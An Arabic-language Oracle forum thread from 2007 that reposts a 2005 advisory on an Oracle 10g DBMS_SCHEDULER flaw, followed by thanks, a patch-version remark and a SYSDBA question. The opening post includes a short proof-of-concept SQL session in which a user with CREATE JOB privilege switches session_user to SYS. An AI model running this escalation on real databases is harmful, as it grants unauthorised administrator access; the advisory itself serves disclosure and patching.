-=|mOOdY|=- بتاريخ: 8 يناير 2007 تقديم بلاغ مشاركة بتاريخ: 8 يناير 2007 (معدل) اثناء تجوالي(بتعرفو انا بسافر كثير ) في احد المواقع (الاجنبية طبعا لان المعلومة عن الاوراكل في المواقع العربية ستكون هنا اولا) لفت انتباهي موضوع عن وجود ثغرة تمت ترقيتها في 5/ 2005 واحنا ما معنا خبر المهم الثغر مش بسيطة فهي تقوم بتحويلالمستخدم العادي الى اليوزر sys نعم sysوهذا مفاد المقال DBMS_SCHEDULER SESSION_USER issue in Oracle 10g Name DBMS_SCHEDULER SESSION_USER issue in Oracle 10g Systems Affected Oracle 10g Severity Medium Risk Category Switch Oracle Username to user SYS Vendor URL http://www.oracle.com/ Credit Oracle Metalink Forum 633336.995 Exploit Forum Entry removed by Oracle Date 07 May 2005 (V 1.02) VU# 176909 Details The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user. Example Connect as a user with CREATE job privilege SQL> select user from dual; USER --------- JOBUSER SQL> execute dbms_scheduler.run_job('ANY_JOB'); PL/SQL procedure successfully completed. SQL> select user from dual; USER --------- SYS SQL> select (sys_context('userenv','session_user')) from dual; USER --------- SYS SQL> select (sys_context('userenv','current_user')) from dual; USER --------- JOBUSER SQL> show user USER is "jobuser" Patch Information Apply the patches for Oracle Critical Patch Update October 2005. History 05-may-2005 US CERT VU# added (V1.01) 07-may-2005 Oracle removed the forum entry from Metalink (V1.02) 18-oct-2005 Oracle released CPU October 2005 تحياتي تم تعديل 28 مايو 2007 بواسطة moody_4u اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
جلال شواقفه بتاريخ: 9 يناير 2007 تقديم بلاغ مشاركة بتاريخ: 9 يناير 2007 معلومه رائعه جداً... الصحيح...الكمال لله.... ويكثر خيرك يا مبدع اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
مبتدأ بتاريخ: 9 يناير 2007 تقديم بلاغ مشاركة بتاريخ: 9 يناير 2007 السلام عليكمشكرا اخي موضوعك زادني حبا للاوراكلشكرا جزيلا اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
-=|mOOdY|=- بتاريخ: 9 يناير 2007 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 9 يناير 2007 الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
mrashaideh بتاريخ: 9 يناير 2007 تقديم بلاغ مشاركة بتاريخ: 9 يناير 2007 And there is some thing elsewhen i grant sysdba to a userand when connect using that user as sysdbawhen i check for the user show useri get SYS not th euser i conneted withis that normal. اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
Tamer-fujitsu بتاريخ: 9 يناير 2007 تقديم بلاغ مشاركة بتاريخ: 9 يناير 2007 شكرا مودى على معلوماتك القيمه ......وياريت متبخلش عننا باى معلومات اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
مبتدأ بتاريخ: 9 يناير 2007 تقديم بلاغ مشاركة بتاريخ: 9 يناير 2007 السلام عليكمانا حاولت اجرب لكن ما قدرتلو في واحد جرب يورينا اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
-=|mOOdY|=- بتاريخ: 9 يناير 2007 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 9 يناير 2007 اخوي الموضوع واضح... هذا كان في اصدار 10g ما قبل التعديل 10.1.0.3 اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
wlahmad بتاريخ: 12 يناير 2007 تقديم بلاغ مشاركة بتاريخ: 12 يناير 2007 معلومة هامة جدانور الله دربك اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
muneer بتاريخ: 13 مارس 2007 تقديم بلاغ مشاركة بتاريخ: 13 مارس 2007 شكرا على المعلومه اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
mozak بتاريخ: 11 أبريل 2007 تقديم بلاغ مشاركة بتاريخ: 11 أبريل 2007 معلومة أكثر من رائعة اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
mora_sallam بتاريخ: 6 مايو 2007 تقديم بلاغ مشاركة بتاريخ: 6 مايو 2007 معلومه رائعه جداً... الصحيح...الكمال لله.... ويكثر خيرك يا مبدع اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
ahmedb72 بتاريخ: 9 مايو 2007 تقديم بلاغ مشاركة بتاريخ: 9 مايو 2007 الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام Yest that's normal اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
amino1 بتاريخ: 9 مايو 2007 تقديم بلاغ مشاركة بتاريخ: 9 مايو 2007 جزاك الله خير ونور بصيرتك اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
O R A C L E بتاريخ: 28 مايو 2007 تقديم بلاغ مشاركة بتاريخ: 28 مايو 2007 T H A N K 'SM O O O D y اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
wooow بتاريخ: 14 يونيو 2007 تقديم بلاغ مشاركة بتاريخ: 14 يونيو 2007 جميل جدا اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
mrr_4y بتاريخ: 14 يونيو 2007 تقديم بلاغ مشاركة بتاريخ: 14 يونيو 2007 جزاك الله الف خيرلكن المهم هل تم معالجتها في الإصدار الأخير أم لا؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
Shibeika بتاريخ: 19 يونيو 2007 تقديم بلاغ مشاركة بتاريخ: 19 يونيو 2007 السلام عليكم ورحمة الله وبركاتهشكرا أخي علي هذه المعلومة اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
moon2006 بتاريخ: 19 يونيو 2007 تقديم بلاغ مشاركة بتاريخ: 19 يونيو 2007 يسلمووووووو أخي على المعلومة بس انا ما بعرف ايش تقصد sys وبالاخص أني مبتدئة بالاوراكل اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
HYDRA بتاريخ: 2 يوليو 2007 تقديم بلاغ مشاركة بتاريخ: 2 يوليو 2007 الف شكر يا اخوي والله يزيد الكرماء من امثالك اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
Recommended Posts
انضم إلى المناقشة
يمكنك المشاركة الآن والتسجيل لاحقاً. إذا كان لديك حساب, سجل دخولك الآن لتقوم بالمشاركة من خلال حسابك.